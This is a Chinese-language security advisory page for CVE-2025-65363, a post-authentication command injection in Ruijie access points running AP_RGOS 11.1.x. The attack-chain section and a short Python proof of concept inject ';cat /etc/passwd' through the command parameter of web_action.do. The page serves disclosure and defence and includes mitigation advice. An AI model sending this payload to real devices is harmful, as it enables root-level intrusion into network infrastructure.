IPBUF安全漏洞报告
English
CVE-2025-65363 CVSS 7.2 高危

CVE-2025-65363 锐捷AP_RGOS命令注入漏洞

披露日期: 2025-12-08

漏洞信息

漏洞编号
CVE-2025-65363
漏洞类型
命令注入
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Ruijie AP (AP_RGOS 11.1.x)

相关标签

命令注入锐捷AP_RGOSRuijie无线接入点认证后漏洞web_action.doCVE-2025-65363

漏洞概述

CVE-2025-65363是锐捷网络(Ruijie)接入点(AP)设备中存在的一个高危命令注入漏洞。该漏洞影响运行AP_RGOS 11.1.x版本系统的RG系列无线接入点产品。漏洞允许已认证的Web用户通过web_action.do端点的command参数注入并执行追加的shell表达式,成功利用后可获得设备的root权限。由于该漏洞需要认证才能利用,因此主要威胁来自内部恶意用户或被窃取凭证的攻击者。成功利用漏洞后,攻击者可以读取敏感配置文件、破坏设备正常运行、甚至进行网络横向移动,对企业无线网络基础设施造成严重安全风险。CVSS 3.1评分7.2,属于高危级别漏洞。

技术细节

该漏洞为典型的认证后命令注入(Command Injection)漏洞。漏洞存在于锐捷AP设备的Web管理界面web_action.do接口中。系统对用户输入的command参数处理不当,未对用户提供的命令进行充分的输入验证和安全过滤,导致攻击者可以通过在参数值中注入分号、管道符等shell特殊字符来执行额外系统命令。由于命令以root权限执行,攻击者可以完全控制设备。在实际利用中,攻击者首先需要通过正常认证流程登录Web管理界面,然后构造包含恶意shell命令的请求发送到web_action.do端点。例如通过command参数注入读取/etc/passwd等敏感文件,或执行重启命令导致服务中断,甚至可以部署后门程序实现持久化控制。

攻击链分析

STEP 1
步骤1
攻击者获取锐捷AP设备的有效Web管理账号凭证(通过社会工程、暴力破解或内部人员泄露)
STEP 2
步骤2
使用获取的凭证登录Web管理界面,建立有效会话
STEP 3
步骤3
构造包含恶意shell命令的请求,发送到/web_action.do端点,在command参数中注入命令(如;cat /etc/passwd)
STEP 4
步骤4
服务器以root权限解析并执行注入的命令,返回命令执行结果
STEP 5
步骤5
攻击者利用root权限读取敏感配置文件、修改系统设置、植入后门或进行网络横向移动

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-65363 PoC - Ruijie AP Command Injection # Target: Ruijie AP with AP_RGOS 11.1.x # Endpoint: web_action.do target_url = "http://<target_ip>/web_action.do" # Authentication (obtain valid session) login_data = { "username": "admin", "password": "<password>" } session = requests.Session() # session.post("http://<target_ip>/login.do", data=login_data) # Command Injection Payload - Read /etc/passwd payload = { "command": ";cat /etc/passwd" } response = session.get(target_url, params=payload) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

影响范围

Ruijie AP_RGOS < 11.1(x) 修复版本

防御指南

临时缓解措施
在官方补丁发布前,建议采取以下临时缓解措施:1)立即更改所有AP设备的管理账户密码为强密码;2)通过网络分段或ACL限制Web管理接口的访问,仅允许管理终端IP访问;3)启用IEEE 802.1X等强认证机制防止凭证泄露;4)部署入侵检测系统监控异常的web_action.do请求;5)定期检查设备日志及时发现可疑活动。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表